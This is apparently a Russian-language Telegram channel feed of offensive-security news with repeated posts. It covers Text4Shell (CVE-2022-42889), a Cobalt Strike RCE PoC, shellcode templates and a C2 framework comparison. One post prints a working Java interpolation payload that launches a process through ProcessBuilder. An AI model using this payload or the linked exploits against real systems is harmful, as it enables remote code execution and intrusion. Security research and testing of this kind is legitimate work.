LockBit и 1000$
Ну как и ожидалось, вся эта тема с татухами хорошего не сулила.
LockBit-Tattoo
А теперь смотрим информацию о владельце репозитория и ....ясно понятно
#98%
Ну как и ожидалось, вся эта тема с татухами хорошего не сулила.
LockBit-Tattoo
А теперь смотрим информацию о владельце репозитория и ....ясно понятно
#98%
😱7👍1
BurpSuite: на удаленке (командная работа)
BurpSuite-Team-Extension
Теперь пентестить ВЕБ можно всей командой, оперативно обмениваться инфой в реалТайме
*
Имеется (Mutual TLS Encryption of all traffic between client and server)
#burp #team
BurpSuite-Team-Extension
Теперь пентестить ВЕБ можно всей командой, оперативно обмениваться инфой в реалТайме
*
Имеется (Mutual TLS Encryption of all traffic between client and server)
#burp #team
CVE-2022-42889
Apache - Commons Text library
CVSS: 9.8 CRITICAL
Почитать про дырку тут
POC
Java:
Apache - Commons Text library
CVSS: 9.8 CRITICAL
Почитать про дырку тут
POC
Java:
StringSubstitutor.createInterpolator().replace("${noscript:js:new java.lang.ProcessBuilder(\"calc\").start()}");
#apache👍15
CVE-2022-39197-master.zip
104.1 KB
CobaltStrike <= 4.7.1 RCE
пора бы обновляться до 4.7.2 (как раз недавно вышла)
пора бы обновляться до 4.7.2 (как раз недавно вышла)
CVE-2022-39197 RCE POC👍3🔥1
Shellcode Template
Легко модифицируемые шеллкод-шаблоны под
#windows #shellcode
Легко модифицируемые шеллкод-шаблоны под
Windows x64/x86
Download#windows #shellcode
🔥7👍1
CVE-2022-42889
Почитать про дырку тут
Сканер дырки на питоне text4shell-tools
Сканер дырки для BurpSuite burp-text4shell
Поиграться с дыркой в докере text4shell-docker
Сам POC
#apache #exploit #poc
Почитать про дырку тут
Сканер дырки на питоне text4shell-tools
Сканер дырки для BurpSuite burp-text4shell
Поиграться с дыркой в докере text4shell-docker
Сам POC
#apache #exploit #poc
🔥10
Кто поможет vx-underground ? Чутка места не хватает у ребят
1,245,000,000 malware samples
#underground #malware
1,245,000,000 malware samples
#underground #malware
🔥22
Поговорим о C&C (С2)
Многие часто спрашивают, какой C2 выбрать, может CobaltStrike или Metasploit, а может даже Sliver ?
*
Для начала читаем статью - Что такое Command and Control?
*
И смотрим сравнительную таблицу C&C (С2) , таблица хоть и далеко не полная, но из нее хорошо видно:
1. на каком ЯП C2 написан
2. какие каналы связи используют агенты
3. что предлагает саппорт
4. ссылки на ГИТы и твиттеры разрабов
5. API and MultiUsering
и тд.
*
Начитавшись - переходим к практике, ставим VM\docker\vagrant или прости господи на 127.0.0.1 и начинаем тестить.
Удачного вкатывания ! 😜
#c&c #c2
Многие часто спрашивают, какой C2 выбрать, может CobaltStrike или Metasploit, а может даже Sliver ?
*
Для начала читаем статью - Что такое Command and Control?
*
И смотрим сравнительную таблицу C&C (С2) , таблица хоть и далеко не полная, но из нее хорошо видно:
1. на каком ЯП C2 написан
2. какие каналы связи используют агенты
3. что предлагает саппорт
4. ссылки на ГИТы и твиттеры разрабов
5. API and MultiUsering
и тд.
*
Начитавшись - переходим к практике, ставим VM\docker\vagrant или прости господи на 127.0.0.1 и начинаем тестить.
Удачного вкатывания ! 😜
#c&c #c2
👍10🔥3😱3